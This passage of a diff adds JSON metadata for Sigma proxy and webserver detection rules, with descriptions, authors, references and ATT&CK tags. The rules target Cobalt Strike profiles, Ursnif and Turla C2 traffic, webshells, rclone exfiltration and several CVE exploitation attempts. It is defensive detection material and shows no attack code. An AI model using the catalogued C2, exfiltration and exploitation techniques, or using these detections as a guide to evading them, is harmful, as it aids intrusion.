.uk or .ca" + ], + "filename": "proxy_ua_bitsadmin_susp_tld.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/jhencinski/status/1102695118455349248", + "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190" + ] + }, + "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", + "value": "Bitsadmin to Uncommon TLD" + }, + { + "description": "Detects Turla ComRAT patterns", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_turla_comrat.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_turla_comrat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001", + "attack.g0010" + ] + }, + "uuid": "7857f021-007f-4928-8b2c-7aedbe64bb82", + "value": "Turla ComRAT" + }, + { + "description": "Detects HTTP requests used by Chafer malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_chafer_malware.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://securelist.com/chafer-used-remexi-malware/89538/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_chafer_malware.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "fb502828-2db0-438e-93e6-801c7548686d", + "value": 
"Chafer Malware URL Pattern" + }, + { + "description": "Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "proxy_exchange_owassrf_poc_exploitation.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", + "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_exchange_owassrf_poc_exploitation.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "fdd7e904-7304-4616-a46a-e32f917c4be4", + "value": "OWASSRF Exploitation Attempt Using Public POC - Proxy" + }, + { + "description": "Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_frameworks.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_frameworks.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", + "value": "Exploit Framework User Agent" + }, + { + "description": "Detects WebDav DownloadCradle", + "meta": { + "author": "Florian Roth", + 
"creation_date": "2018/04/06", + "falsepositive": [ + "Administrative scripts that download files from the Internet", + "Administrative scripts that retrieve certain website contents", + "Legitimate WebDAV administration" + ], + "filename": "proxy_downloadcradle_webdav.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_downloadcradle_webdav.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", + "value": "Windows WebDAV User Agent" + }, + { + "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/08", + "falsepositive": [ + "Software downloads" + ], + "filename": "proxy_download_susp_dyndns.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_dyndns.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1105", + "attack.t1568" + ] + }, + "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", + "value": "Download from Suspicious Dyndns Hosts" + }, + { + "description": "Detects Malleable OneDrive Profile", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_onedrive.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", 
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_onedrive.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", + "value": "CobaltStrike Malleable OneDrive Browsing Traffic Profile" + }, + { + "description": "Detects suspicious malformed user agent strings in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_susp.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", + "value": "Suspicious User Agent" + }, + { + "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/05", + "falsepositive": [ + "Legitimate use of Telegram bots in the company" + ], + "filename": "proxy_telegram_api.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + 
"attack.t1071.001", + "attack.t1102.002" + ] + }, + "uuid": "b494b165-6634-483d-8c47-2026a6c52372", + "value": "Telegram API Access" + }, + { + "description": "Detects executable downloads from suspicious remote systems", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/13", + "falsepositive": [ + "All kind of software downloads" + ], + "filename": "proxy_download_susp_tlds_whitelist.yml", + "level": "low", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_whitelist.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566", + "attack.execution", + "attack.t1203", + "attack.t1204.002" + ] + }, + "uuid": "b5de2919-b74a-4805-91a7-5049accbaefe", + "value": "Download EXE from Suspicious TLD" + }, + { + "description": "Detects suspicious user agent strings used by malware in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_malware.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", + "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", + "http://www.botopedia.org/search?searchword=scan&searchphrase=all", + "https://perishablepress.com/blacklist/ua-2013.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", + "value": "Malware User Agent" + }, + { + "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/10", + 
"falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_bitsadmin_susp_ip.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_ip.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190" + ] + }, + "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", + "value": "Bitsadmin to Uncommon IP Server Address" + }, + { + "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/10/18", + "falsepositive": [ + "Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations" + ], + "filename": "proxy_ua_rclone.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", + "https://rclone.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", + "value": "Rclone Activity via Proxy" + }, + { + "description": "Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/22", + "falsepositive": [ + "Web vulnerability scanners" + ], + "filename": "proxy_exchange_owassrf_exploitation.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + 
"https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", + "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_exchange_owassrf_exploitation.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "1ddf4596-1908-43c9-add2-1d2c2fcc4797", + "value": "Potential OWASSRF Exploitation Attempt - Proxy" + }, + { + "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_cryptominer.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", + "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_cryptominer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", + "value": "Crypto Miner User Agent" + }, + { + "description": "Detects download of Ursnif malware done by dropper documents.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ursnif_malware_download_url.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_download_url.yml" + ], + "tags": "No established tags" + }, + "uuid": "a36ce77e-30db-4ea0-8795-644d7af5dfb4", + "value": "Ursnif Malware Download URL Pattern" + }, + { + "description": "Detects URL pattern 
used by iOS Implant", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ios_implant.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "https://twitter.com/craiu/status/1167358457344925696", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ios_implant.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.collection", + "attack.t1005", + "attack.t1119", + "attack.credential_access", + "attack.t1528", + "attack.t1552.001" + ] + }, + "uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", + "value": "iOS Implant URL Pattern" + }, + { + "description": "Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_malformed_uas.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_malformed_uas.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", + "value": "CobaltStrike Malformed UAs in Malleable Profiles" + }, + { + "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/05", + "falsepositive": [ + "User activity (e.g. 
developer that shared and copied code snippets and used the raw link instead of just copy & paste)" + ], + "filename": "proxy_raw_paste_service_access.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.virustotal.com/gui/domain/paste.ee/relations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_raw_paste_service_access.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.001", + "attack.t1102.003", + "attack.defense_evasion" + ] + }, + "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", + "value": "Raw Paste Service Access" + }, + { + "description": "Detect update check performed by Advanced IP Scanner and Advanced Port Scanner", + "meta": { + "author": "Axel Olsson", + "creation_date": "2022/08/14", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proxy_adv_ip_port_scanner_upd_check.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.advanced-port-scanner.com/", + "https://www.advanced-ip-scanner.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1590" + ] + }, + "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", + "value": "Advanced IP/Port Scanner Update Check" + }, + { + "description": "Detects download of certain file types from hosts in suspicious TLDs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/07", + "falsepositive": [ + "All kinds of software downloads" + ], + "filename": "proxy_download_susp_tlds_blacklist.yml", + "level": "low", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", + "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", + 
"https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", + "https://www.spamhaus.org/statistics/tlds/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566", + "attack.execution", + "attack.t1203", + "attack.t1204.002" + ] + }, + "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", + "value": "Download from Suspicious TLD" + }, + { + "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "proxy_apt_domestic_kitten.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt_domestic_kitten.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1", + "value": "Domestic Kitten FurBall Malware Pattern" + }, + { + "description": "Detects Malleable Amazon Profile", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_amazon.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", + "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": 
"953b895e-5cc9-454b-b183-7f3db555452e", + "value": "CobaltStrike Malleable Amazon Browsing Traffic Profile" + }, + { + "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_pwndrop.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://breakdev.org/pwndrop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_pwndrop.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.t1102.001", + "attack.t1102.003" + ] + }, + "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", + "value": "PwnDrp Access" + }, + { + "description": "Detects Malleable (OCSP) Profile with Typo (OSCP) in URL", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/11/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_cobalt_ocsp.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_ocsp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "37325383-740a-403d-b1a2-b2b4ab7992e7", + "value": "CobaltStrike Malleable (OCSP) Profile" + }, + { + "description": "Detects Windows PowerShell Web Access", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/13", + "falsepositive": [ + "Administrative scripts that download files from the Internet", + "Administrative scripts that retrieve certain website contents" + ], + "filename": "proxy_powershell_ua.yml", + "level": "medium", + "logsource.category": "proxy", + 
"logsource.product": "No established product", + "refs": [ + "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_powershell_ua.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "c8557060-9221-4448-8794-96320e6f3e74", + "value": "Windows PowerShell User Agent" + }, + { + "description": "Detects Java class download in proxy logs, e.g. used in Log4shell exploitation attacks against Log4j.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/12/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_java_class_download.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_java_class_download.yml" + ], + "tags": [ + "attack.initial_access" + ] + }, + "uuid": "53c15703-b04c-42bb-9055-1937ddfb3392", + "value": "Java Class Proxy Download" + }, + { + "description": "Detects Baby Shark C2 Framework communication patterns", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_baby_shark.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_baby_shark.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", + "value": "BabyShark Agent Pattern" + }, + { + "description": "Detects suspicious user agent strings user by hack tools in proxy logs", + "meta": { + "author": "Florian Roth", + 
"creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ua_hacktool.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", + "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_hacktool.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", + "value": "Hack Tool User Agent" + }, + { + "description": "Detects suspicious user agent string of APT40 Dropbox tool", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/11/12", + "falsepositive": [ + "Old browsers" + ], + "filename": "proxy_apt40.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "Internal research from Florian Roth", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt40.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001", + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "5ba715b6-71b7-44fd-8245-f66893e81b3d", + "value": "APT40 Dropbox Tool User Agent" + }, + { + "description": "Detects Ursnif C2 traffic.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_ursnif_malware_c2_url.yml", + "level": "critical", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_c2_url.yml" + ], + "tags": [ + "attack.initial_access", + 
"attack.t1566.001", + "attack.execution", + "attack.t1204.002", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "932ac737-33ca-4afd-9869-0d48b391fcc9", + "value": "Ursnif Malware C2 URL Pattern" + }, + { + "description": "Detects suspicious empty user agent strings in proxy logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proxy_empty_ua.yml", + "level": "medium", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/Carlos_Perez/status/883455096645931008", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empty_ua.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", + "value": "Empty User Agent" + }, + { + "description": "Detects a flashplayer update from an unofficial location", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/10/25", + "falsepositive": [ + "Unknown flash download locations" + ], + "filename": "proxy_susp_flash_download_loc.yml", + "level": "high", + "logsource.category": "proxy", + "logsource.product": "No established product", + "refs": [ + "https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb", + "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_susp_flash_download_loc.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1189", + "attack.execution", + "attack.t1204.002", + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", + "value": "Flash Player Update from Suspicious Location" + }, + { + "description": "Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2020/03/10", + "falsepositive": [ + "Unknown" + ], + "filename": 
"web_cve_2021_21978_vmware_view_planner_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://paper.seebug.org/1495/", + "https://twitter.com/wugeej/status/1369476795255320580", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "cve.2021.21978" + ] + }, + "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9", + "value": "CVE-2021-21978 Exploitation Attempt" + }, + { + "description": "Detects Windows Webshells that use GET requests via access logs", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2017/02/19", + "falsepositive": [ + "Web sites like wikis with articles on os commands and pages that include the os commands in the URLs", + "User searches in search boxes of the respective website" + ], + "filename": "web_win_webshells_in_access_logs.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://bad-jubies.github.io/RCE-NOW-WHAT/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "7ff9db12-1b94-4a79-ba68-a2402c5d6729", + "value": "Windows Webshell Strings" + }, + { + "description": "Detects exploitation attempts on WebLogic servers", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/11/02", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2020_14882_weblogic_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/sudo_sudoka/status/1323951871078223874", + "https://isc.sans.edu/diary/26734", + 
"https://twitter.com/jas502n/status/1321416053050667009?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml" + ], + "tags": [ + "attack.t1190", + "attack.initial_access", + "cve.2020.14882" + ] + }, + "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b", + "value": "Oracle WebLogic Exploit CVE-2020-14882" + }, + { + "description": "Detects potential exploitation of CVE-2021-260841 a Confluence RCE using OGNL injection", + "meta": { + "author": "Sittikorn S, Nuttakorn T", + "creation_date": "2022/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "web_cve_2021_26084_confluence_rce_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/", + "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md", + "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md", + "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26084_confluence_rce_exploit.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "uuid": "38825179-3c78-4fed-b222-2e2166b926b1", + "value": "Potential CVE-2021-26084 Exploitation Attempt" + }, + { + "description": "Detects exploitation attempts of the SonicWall Jarrewrite Exploit", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/25", + "falsepositive": [ + "Unknown" + ], + "filename": "web_sonicwall_jarrewrite_exploit.yml", + "level": "high", + "logsource.category": "webserver", + "logsource.product": "No established product", + "refs": [ + "https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/", + 
